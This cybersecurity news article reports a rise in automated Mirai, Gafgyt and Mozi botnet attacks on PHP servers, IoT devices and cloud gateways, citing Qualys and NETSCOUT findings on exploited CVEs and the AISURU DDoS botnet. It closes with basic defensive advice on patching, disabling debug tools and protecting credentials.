Cybersecurity researchers have warned about a major surge in automated botnet attacks aimed at PHP servers, IoT devices, and cloud gateways. The new wave of activity is primarily driven by well-known botnets such as Mirai, Gafgyt, and Mozi, according to a recent report from the Qualys Threat Research Unit (TRU).
The Growing Threat
These botnets are exploiting known CVE vulnerabilities and cloud misconfigurations to compromise exposed systems and expand their malicious networks. PHP servers have become prime targets due to their wide use in content management systems like WordPress and Craft CMS, often plagued by misconfigurations, outdated plugins, and insecure file storage.
Vulnerabilities Exploited
Some of the key PHP-related vulnerabilities under attack include:
- CVE-2017-9841 – Remote code execution in PHPUnit
- CVE-2021-3129 – Remote code execution in Laravel
- CVE-2022-47945 – Remote code execution in ThinkPHP Framework
Researchers also spotted attempts using the query string
/?XDEBUG_SESSION_START=phpstorm in HTTP requests —
a sign that attackers are exploiting Xdebug to initiate debugging sessions in production environments.
Leaving debugging tools like Xdebug active in production can expose sensitive data or reveal application logic to attackers.
IoT Devices Under Siege
Beyond PHP servers, attackers are also targeting IoT systems and cloud services. Commonly exploited weaknesses include:
- CVE-2022-22947 – RCE in Spring Cloud Gateway
- CVE-2024-3721 – Command injection in TBK DVR-4104 and DVR-4216
- MVPower TV-7104HE DVR Misconfiguration – Allows unauthenticated command execution
The scanning and exploitation attempts are often traced back to major cloud infrastructures like AWS, Google Cloud, Microsoft Azure, and DigitalOcean — showing that attackers are abusing legitimate cloud platforms to hide their identities.
Low Skill, High Impact
“Today’s threat actors don’t need to be highly sophisticated to be effective,” said Qualys.
With access to readily available exploit kits, botnet frameworks, and scanning tools, even entry-level hackers can cause massive disruption.
How to Protect Your Systems
Security experts recommend the following steps:
- Keep all devices and software up to date
- Disable debug tools and development frameworks in production
- Store secrets securely using AWS Secrets Manager or HashiCorp Vault
- Restrict public access to cloud environments
The New Face of Botnets
According to James Maude, Field CTO at BeyondTrust, botnets are evolving beyond DDoS and cryptomining:
“Botnets now play a critical role in identity-based attacks like credential stuffing and password spraying. They can even evade geolocation-based defenses by mimicking legitimate user activity.”
By hijacking routers and IoT devices, attackers gain access to thousands of real IP addresses, helping them bypass security filters and login anomaly detection systems.
AISURU: The TurboMirai Botnet
In a related disclosure, NETSCOUT identified a new DDoS-for-hire botnet dubbed AISURU, which belongs to a new malware class called TurboMirai.
This botnet can launch massive DDoS attacks exceeding 20 Tbps, leveraging consumer-grade routers, CCTV systems, and DVRs.
AISURU also includes a residential proxy network, allowing paying users to route their traffic through compromised devices. This provides anonymity, geographical masking, and the ability to blend with regular network activity — making detection much harder.
Final Thoughts
The rise of automated botnet attacks shows how easily threat actors can weaponize common misconfigurations and unpatched systems.
In 2025’s interconnected world, basic hygiene — like patching, restricting exposure, and securing credentials — remains the best defense.
As these botnets continue to evolve, so must our defenses.